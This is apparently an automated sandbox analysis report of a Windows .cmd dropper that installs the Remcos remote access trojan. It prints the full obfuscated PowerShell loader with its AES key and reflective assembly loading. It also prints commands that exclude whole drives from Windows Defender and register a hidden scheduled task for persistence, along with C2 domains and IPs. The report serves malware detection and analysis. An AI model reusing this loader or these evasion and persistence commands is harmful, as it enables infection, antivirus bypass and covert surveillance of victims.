
Windows Analysis Report
UrgenteNotificationRef.cmd

Overview

General Information

Sample name: UrgenteNotificationRef.cmd
Analysis ID: 1431053
MD5: f01b6515e2ba3feb16fd0aee360dd548
SHA1: b4b9e3ced7f77f3f0ec4434c22ac17c8e0449a4d
SHA256: 0aa7625b469a7a8d9ab9f6fdd8a17050f7774aaeced7ba3e4d93fbb4c63e2bd7

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Sigma detected: Remcos
Yara detected Remcos RAT
Adds a directory exclusion to Windows Defender
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR 
([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7448 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7404 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR 
([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • powershell.exe (PID: 5800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 928 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source: C:\Users\user\AppData\Roaming\brotha\logs.dat
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7448, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 7680, ProcessName: powershell.exe
    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7448, TargetFilename: C:\Users\user\AppData\Roaming\Network28681Man.cmd
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7448, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 7680, ProcessName: powershell.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7448, ProcessName: powershell.exe

    Stealing of Sensitive Information

    Source: Registry Key set | Author: Joe Security | Data: Details: 72 6B 53 A3 8B BA 7E 6E D1 46 BB B0 10 E8 6A 65 86 6A 5C FF A6 98 FB 81 56 2E 2B C4 F6 DC 0C C0 0A F4 D4 C9 63 EA 87 00 62 C5 90 7E 84 B8 C4 AC DE 36 7F 0B 2B C5 71 DC 32 8C 4C DB 4F A4 47 20 97 7C CE E0 A4 E8 D7 5A 31 D6 94 A6 88 D7 BD A4 A0 98 36 8D 26 CC DE 90 B7 B9 0B 33 23 A9 D1 53 2F 84 B4 BB 2B DF 55 C5 14 36 4F 0C B0 12 2B 5C 3E FF D8 A7, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-K9847Q\exepath
    No Snort rule has matched


    AV Detection

    Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
    Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
    Source: Yara match | File source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    Networking

    Source: unknown | DNS query: name: embargogo237.duckdns.org
    Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 45.74.19.121:10521
    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
    Source: Joe Sandbox View | IP Address: 45.74.19.121
    Source: Joe Sandbox View | IP Address: 178.237.33.50
    Source: Joe Sandbox View | ASN Name: HVC-ASUS
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: embargogo237.duckdns.org
    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
    Source: powershell.exe, 0000000C.00000002.1857143467.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
    Source: powershell.exe, 00000017.00000002.1893864511.0000000006FC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft0
    Source: powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000006.00000002.1670797373.0000000005502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.1670797373.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1670797373.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2105453899.0000000000A88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

    E-Banking Fraud

    Source: Yara match | File source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    System Summary

    Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2186
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: Commandline size = 2187
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447B4A0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447B490
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0447B49B
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00F3B1B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00F3B0D7
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00F394D0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07601F7C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1C538
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00E1C537
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_0819407A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 28_2_04C7B030
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 28_2_04C7B020
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 28_2_04C7AF97
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 28_2_087E1D68
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winCMD@43/40@2/2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\bGXRavBzfI
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-K9847Q
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd1d5j4k.kqr.ps1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: powershell.exe | String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
